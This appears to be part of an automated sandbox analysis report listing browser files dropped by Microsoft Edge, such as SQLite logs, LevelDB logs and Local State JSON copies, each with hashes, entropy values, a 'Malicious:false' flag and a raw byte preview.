                                                                                                                                                                                                                                                                              SHA-512:B2EC7516F00173BE83C31CA582BE144B37F25F6A6AAC0852E4EE4E86F8EDB52371C529F376B844451B48C6E04C2002C36AF2CB65D061DEC9E1AC78F951849878
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:..-.............M.......h....q..3.-.....*.!9.{..-.............M.......h....q..3.-.....*.!9.{........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):317272
                                                                                                                                                                                                                                                                              Entropy (8bit):0.8893815912293735
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:hWODer73U+xdcMb0n4OY5JOo17Mv8dyLyGoy5yE0yDxy6u:AwA
                                                                                                                                                                                                                                                                              MD5:9A63992B46487D730D87E3313671F0F6
                                                                                                                                                                                                                                                                              SHA1:2EAFD9D2FBD2D752691F6424EAD41ADCFDEE6983
                                                                                                                                                                                                                                                                              SHA-256:9C07BF40A0151DBC571BAC425E9803C04F29AE87A1086AE465EBA647F8CFC943
                                                                                                                                                                                                                                                                              SHA-512:834EA768CB322333D36056A6E3282248C8720CDCDC44FDAF5F1F6D176E72FA419AA028CFF1F184C6FDA295495B3435B09587B322C716F420E397BF3FFBC4C23E
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:7....-..........3.-.......F`..........3.-......+..O.\SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):419
                                                                                                                                                                                                                                                                              Entropy (8bit):3.699260092783771
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:/XntM+dl3sedhOmOuuuuuuuuuuuuhOsedhOXsn:llc8BOuuuuuuuuuuuuhD8Ss
                                                                                                                                                                                                                                                                              MD5:FB337CDD066C7731AFD3C439B49B82BC
                                                                                                                                                                                                                                                                              SHA1:DEBD2CD663E7A4BB098DF38C79052EF9689FABCB
                                                                                                                                                                                                                                                                              SHA-256:933D7B8A00938134E817A383D7943C57B2A922EBDBFFBB9AB6E1C3E26205EA16
                                                                                                                                                                                                                                                                              SHA-512:0EC0C4D179541DA1AC7AA2C3D659411AEE939635866316650C2FF79DBACC7DC1C86EDEDE3E1F1231010B8A07999BD890F53CC35C446DA4C28DF8BB61002177F2
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:A..r.................20_1_1...1.,U.................20_1_1...1...0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=..................0................39_config..........6.....n ....1

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):330
                                                                                                                                                                                                                                                                              Entropy (8bit):5.14039084859928
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfxpFIq2PcNwi23oH+TcwtfrK+IFUt8IXfxpFZZmw+IXfxKkwOcNwi23oH+Tcwf:RrIvLZYeb23FUt86rZ/+6K54ZYeb3J
                                                                                                                                                                                                                                                                              MD5:FBE5DC65E9DB853B73F0D8288E518B14
                                                                                                                                                                                                                                                                              SHA1:1609C19E168F892003F0AC11D9F459709D0BF490
                                                                                                                                                                                                                                                                              SHA-256:E99743E0ADCE4C14B9FA6E78D18067634A150F36DC398427FE0D0F1E74A6ED48
                                                                                                                                                                                                                                                                              SHA-512:1204D73CCC6C04AC87B71FEEE741FAEA44AC5CBA9DC9BE9BB0AC0FF37CF3FAC9DA4F71B03D49AE9123D7F39934250ADD630E84079B4509A1F02B4E56C581DA68
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:13.334 1c04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/20-02:42:13.334 1c04 Recovering log #3.2024/12/20-02:42:13.335 1c04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):330
                                                                                                                                                                                                                                                                              Entropy (8bit):5.14039084859928
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfxpFIq2PcNwi23oH+TcwtfrK+IFUt8IXfxpFZZmw+IXfxKkwOcNwi23oH+Tcwf:RrIvLZYeb23FUt86rZ/+6K54ZYeb3J
                                                                                                                                                                                                                                                                              MD5:FBE5DC65E9DB853B73F0D8288E518B14
                                                                                                                                                                                                                                                                              SHA1:1609C19E168F892003F0AC11D9F459709D0BF490
                                                                                                                                                                                                                                                                              SHA-256:E99743E0ADCE4C14B9FA6E78D18067634A150F36DC398427FE0D0F1E74A6ED48
                                                                                                                                                                                                                                                                              SHA-512:1204D73CCC6C04AC87B71FEEE741FAEA44AC5CBA9DC9BE9BB0AC0FF37CF3FAC9DA4F71B03D49AE9123D7F39934250ADD630E84079B4509A1F02B4E56C581DA68
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:13.334 1c04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/20-02:42:13.334 1c04 Recovering log #3.2024/12/20-02:42:13.335 1c04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):782
                                                                                                                                                                                                                                                                              Entropy (8bit):4.049291162962452
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ys:G0nYUtypD32m3yWlIZMBA5NgKIvB8s
                                                                                                                                                                                                                                                                              MD5:FDF465758A7489458B387EB41C7D42B0
                                                                                                                                                                                                                                                                              SHA1:9509283CF1BD7397790091C5A7580CBA353A1143
                                                                                                                                                                                                                                                                              SHA-256:C5A7592A847D101DCB71AEE0A234835548121C647E6D99EF794337823A347703
                                                                                                                                                                                                                                                                              SHA-512:9E40B768990B3FAC6960274C5C78F9B86585100DBFE92BC885FC5384937F2922C3ED435B44C42DEAC138E8FB22CD1EED865DBB984CFFDAE8ED0BE96EDADA1698
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):348
                                                                                                                                                                                                                                                                              Entropy (8bit):5.143408370593634
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfxKJVRFIq2PcNwi23oH+TcwtfrzAdIFUt8IXfx/pZZmw+IXfx/pzkwOcNwi23q:RKbjIvLZYeb9FUt86b/+6x54ZYeb2J
                                                                                                                                                                                                                                                                              MD5:CCF79FE89DCCE9151C269903680A9C82
                                                                                                                                                                                                                                                                              SHA1:385C24B14928ACC99AFB6D23EF22CA11067F5D7A
                                                                                                                                                                                                                                                                              SHA-256:98C9AC8E3E756186497254CFA1DE05A4D0411EFCB340355A77E3910C5D7AA1DA
                                                                                                                                                                                                                                                                              SHA-512:1E4683E87E8A4B0AEBE04D4EE57639D9172252AE5473810A6E711CC32E79D5D7426941BB3655F76D4912724E18BE3B9D56CCA382EC82C3075793301A16A1FCDB
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:13.326 1c04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/20-02:42:13.329 1c04 Recovering log #3.2024/12/20-02:42:13.329 1c04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):348
                                                                                                                                                                                                                                                                              Entropy (8bit):5.143408370593634
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfxKJVRFIq2PcNwi23oH+TcwtfrzAdIFUt8IXfx/pZZmw+IXfx/pzkwOcNwi23q:RKbjIvLZYeb9FUt86b/+6x54ZYeb2J
                                                                                                                                                                                                                                                                              MD5:CCF79FE89DCCE9151C269903680A9C82
                                                                                                                                                                                                                                                                              SHA1:385C24B14928ACC99AFB6D23EF22CA11067F5D7A
                                                                                                                                                                                                                                                                              SHA-256:98C9AC8E3E756186497254CFA1DE05A4D0411EFCB340355A77E3910C5D7AA1DA
                                                                                                                                                                                                                                                                              SHA-512:1E4683E87E8A4B0AEBE04D4EE57639D9172252AE5473810A6E711CC32E79D5D7426941BB3655F76D4912724E18BE3B9D56CCA382EC82C3075793301A16A1FCDB
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:13.326 1c04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/20-02:42:13.329 1c04 Recovering log #3.2024/12/20-02:42:13.329 1c04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):120
                                                                                                                                                                                                                                                                              Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                              MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                              SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                              SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                              SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                                                                                              Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                              MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                              SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                              SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                              SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:117.0.2045.47

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):56066
                                                                                                                                                                                                                                                                              Entropy (8bit):6.103038538835172
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:z/Ps+wsI7ynCPGWv/sxtwz7VLyMV/YoskFoz:z/0+zI7yn2v/4KfVeZoskG
                                                                                                                                                                                                                                                                              MD5:1493482BF2137752290BC320FB3E4DF5
                                                                                                                                                                                                                                                                              SHA1:1E61B03FD0D1710CC85D7346DEF286C7C0A6441F
                                                                                                                                                                                                                                                                              SHA-256:3C2967E1451BCF9EAA855BB0BB924A7E6E0B21107AE5ED990CCD299AF9A2D733
                                                                                                                                                                                                                                                                              SHA-512:9EECE4AE9E25E3FCD2B0C98F2F99D204412B621AA7DEA027C51F123FFE682B7C4090F0628724682D78EC07720BFB2B3537E138143A079C1F085933C2FC50BCC6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF25f7b.TMP (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):56066
                                                                                                                                                                                                                                                                              Entropy (8bit):6.103038538835172
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:z/Ps+wsI7ynCPGWv/sxtwz7VLyMV/YoskFoz:z/0+zI7yn2v/4KfVeZoskG
                                                                                                                                                                                                                                                                              MD5:1493482BF2137752290BC320FB3E4DF5
                                                                                                                                                                                                                                                                              SHA1:1E61B03FD0D1710CC85D7346DEF286C7C0A6441F
                                                                                                                                                                                                                                                                              SHA-256:3C2967E1451BCF9EAA855BB0BB924A7E6E0B21107AE5ED990CCD299AF9A2D733
                                                                                                                                                                                                                                                                              SHA-512:9EECE4AE9E25E3FCD2B0C98F2F99D204412B621AA7DEA027C51F123FFE682B7C4090F0628724682D78EC07720BFB2B3537E138143A079C1F085933C2FC50BCC6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF25f8b.TMP (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):56066
                                                                                                                                                                                                                                                                              Entropy (8bit):6.103038538835172
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:z/Ps+wsI7ynCPGWv/sxtwz7VLyMV/YoskFoz:z/0+zI7yn2v/4KfVeZoskG
                                                                                                                                                                                                                                                                              MD5:1493482BF2137752290BC320FB3E4DF5
                                                                                                                                                                                                                                                                              SHA1:1E61B03FD0D1710CC85D7346DEF286C7C0A6441F
                                                                                                                                                                                                                                                                              SHA-256:3C2967E1451BCF9EAA855BB0BB924A7E6E0B21107AE5ED990CCD299AF9A2D733
                                                                                                                                                                                                                                                                              SHA-512:9EECE4AE9E25E3FCD2B0C98F2F99D204412B621AA7DEA027C51F123FFE682B7C4090F0628724682D78EC07720BFB2B3537E138143A079C1F085933C2FC50BCC6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF26160.TMP (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):56066
                                                                                                                                                                                                                                                                              Entropy (8bit):6.103038538835172
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:z/Ps+wsI7ynCPGWv/sxtwz7VLyMV/YoskFoz:z/0+zI7yn2v/4KfVeZoskG
                                                                                                                                                                                                                                                                              MD5:1493482BF2137752290BC320FB3E4DF5
                                                                                                                                                                                                                                                                              SHA1:1E61B03FD0D1710CC85D7346DEF286C7C0A6441F
                                                                                                                                                                                                                                                                              SHA-256:3C2967E1451BCF9EAA855BB0BB924A7E6E0B21107AE5ED990CCD299AF9A2D733
                                                                                                                                                                                                                                                                              SHA-512:9EECE4AE9E25E3FCD2B0C98F2F99D204412B621AA7DEA027C51F123FFE682B7C4090F0628724682D78EC07720BFB2B3537E138143A079C1F085933C2FC50BCC6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF28812.TMP (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):56066
                                                                                                                                                                                                                                                                              Entropy (8bit):6.103038538835172
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:z/Ps+wsI7ynCPGWv/sxtwz7VLyMV/YoskFoz:z/0+zI7yn2v/4KfVeZoskG
                                                                                                                                                                                                                                                                              MD5:1493482BF2137752290BC320FB3E4DF5
                                                                                                                                                                                                                                                                              SHA1:1E61B03FD0D1710CC85D7346DEF286C7C0A6441F
                                                                                                                                                                                                                                                                              SHA-256:3C2967E1451BCF9EAA855BB0BB924A7E6E0B21107AE5ED990CCD299AF9A2D733
                                                                                                                                                                                                                                                                              SHA-512:9EECE4AE9E25E3FCD2B0C98F2F99D204412B621AA7DEA027C51F123FFE682B7C4090F0628724682D78EC07720BFB2B3537E138143A079C1F085933C2FC50BCC6
                                                                                                                                                                                                                                                                              Malicious:false
